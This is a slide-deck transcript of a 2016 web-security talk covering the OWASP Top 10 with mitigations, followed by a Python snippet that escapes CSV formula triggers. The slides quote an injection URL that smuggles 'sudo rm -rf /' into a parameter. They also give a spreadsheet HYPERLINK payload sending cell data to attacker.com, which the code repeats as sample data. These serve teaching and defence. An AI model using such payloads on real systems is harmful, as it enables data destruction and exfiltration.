Let's talk Security

Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016

Transcript

  1. Let’s talk Security: Understanding, Exploiting and Defending against Top Web Vulnerabilities. Dheeraj Joshi, djadmin.in
  2. About Me: I find security vulnerabilities for fun & swag, and I wear a White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, Cloudflare, Intuit, Groupon, etc. What makes me happy?
  3. Security - Into The Details • OWASP’s Top 10 Vulnerabilities ◦ Explain ◦ Impact ◦ Defense ◦ Real examples (External + Internal) • Demo - RCE • Q & A
  4. Why should Startups Care about Security? Startups & SMEs are quick to cut corners. One of the first things they cut is ‘Security’.
  5. [image-only slide]
  6. HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS - The Shutdown
  7. OWASP Top 10 And Beyond

  8. INJECTION

  9. PREVENT INJECTION • For databases, use prepared statements • Whitelist inputs wherever possible • Sanitize inputs (use the filter extension) • Don’t trust user input; always verify!
  10. Example: Google Command Injection. We can include any command in the URL below: https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh)
  11. Exploiting ‘Export as CSV’ functionality: Formula Injection. =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information") If the victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to the attacker’s website, which may include other users’ sensitive information. Fix: prepend a single quote (‘) to any cell value that starts with a formula trigger (=, +, -).
  12. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

  13. MITIGATION • Enforce a strong password policy • Require periodic password resets • Use two-factor authentication • Use SSL and the secure flag on cookies • Don’t neglect failed-login detection & tracking • Only use httpOnly cookies
  14. CROSS SITE SCRIPTING - XSS • XSS attacks users • “JavaScript Injection” • Exploits can be bad, really bad...
  15. What is XSS? Typical Reflected XSS

  16. Stored XSS

  17. DOM XSS

  18. Protect Yourself • Use the filter extension to filter inputs • Ensure that outputs are HTML encoded • Don’t reinvent the wheel • Don’t consider any part of the request as being “safe”
  19. ngBind attribute; $sanitize - service in module ngSanitize: sanitizes an HTML string by stripping all potentially dangerous tokens.
  20. INSECURE DIRECT OBJECT REFERENCES

  21. Scenario / Exploit 1) First, an attacker signs up for an account and requests “forgot password”. 2) You will receive a link: https://vimeo.com/forgot_password/[user id]/[token]
  22. Prevention • Low-level access controls • Prevent user input in file/URL access commands • No unsanitized input to execution commands
  23. SECURITY MISCONFIGURATION

  24. PREVENTION > CURE • Perform periodic security checks using automated tools • Static Code Analysis • Example: Hardening MySQL, Directory Listing, Auth Tokens
  25. SENSITIVE DATA EXPOSURE • Exposed PHP error messages • Unencrypted sensitive data storage • Not using SSL • Example: a sensitive token should not be sent to external websites (Fitbit)
  26. MISSING FUNCTION LEVEL ACCESS CONTROL • Valid input processing without access controls • Decentralized access control layer • Example: Profile email address not validated (GitHub), S3 configuration
  27. CROSS-SITE REQUEST FORGERY (CSRF) • Don’t perform data changes on GET • Use secure (CSRF) tokens for POST • Impact: really bad, attacks users • Example: Dropbox, CodeSchool
  28. USING COMPONENTS WITH KNOWN VULNERABILITIES • Not keeping libraries up-to-date • *cough*WordPress*cough* • Example: Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE)
  29. UNVALIDATED REDIRECTS AND FORWARDS • Header Injection • JavaScript Parameter Injection • Reliance on HTTP_REFERER • Abuse of window.opener (Facebook)
  30. Example : Dropbox Open Redirect in v1 API

  31. Remote Code Execution

  32. The solution • Reset all passwords and keys • Remove backdoors (not easy) OR Destroy everything??
  33. Thank you. References: • https://www.owasp.org • https://djadmin.in/pwn/ (tools)
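The single-quote fix for the CSV formula injection on slide 11, as an added example (this is not code from the talk or from Wingify). It goes slightly beyond the slide: besides =, + and - it also treats @, tab and carriage return as formula triggers, following OWASP's CSV-injection guidance, and it uses Python's csv module so commas and quotes in cell values are handled as well. The sample rows are constructed.

```python
import csv
import io

# Characters a spreadsheet treats as the start of a formula. The slide lists
# =, + and -; OWASP's CSV-injection guidance adds @, tab and CR, so this
# tuple is a superset of what the slide shows (assumption: the broader list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return value prefixed with a single quote if it would parse as a formula.

    The leading quote makes the spreadsheet store the cell as literal text,
    so =HYPERLINK(...) is displayed as-is instead of being evaluated.
    Trade-off: a numeric string such as "-5" is also prefixed and becomes
    text; emit real numbers separately if that matters for the export.
    """
    if value is None:
        return ""
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows):
    """Serialise rows (lists of cell values) to CSV text, neutralizing every cell.

    csv.writer quotes commas, double quotes and newlines; neutralize_cell
    handles the formula triggers, which ordinary CSV quoting does not stop.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample export: one ordinary user and one whose "name" field
# carries the HYPERLINK payload shown on slide 11.
SAMPLE_ROWS = [
    ["name", "email"],
    ["Alice", "alice@example.com"],
    ['=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")',
     "bob@example.com"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```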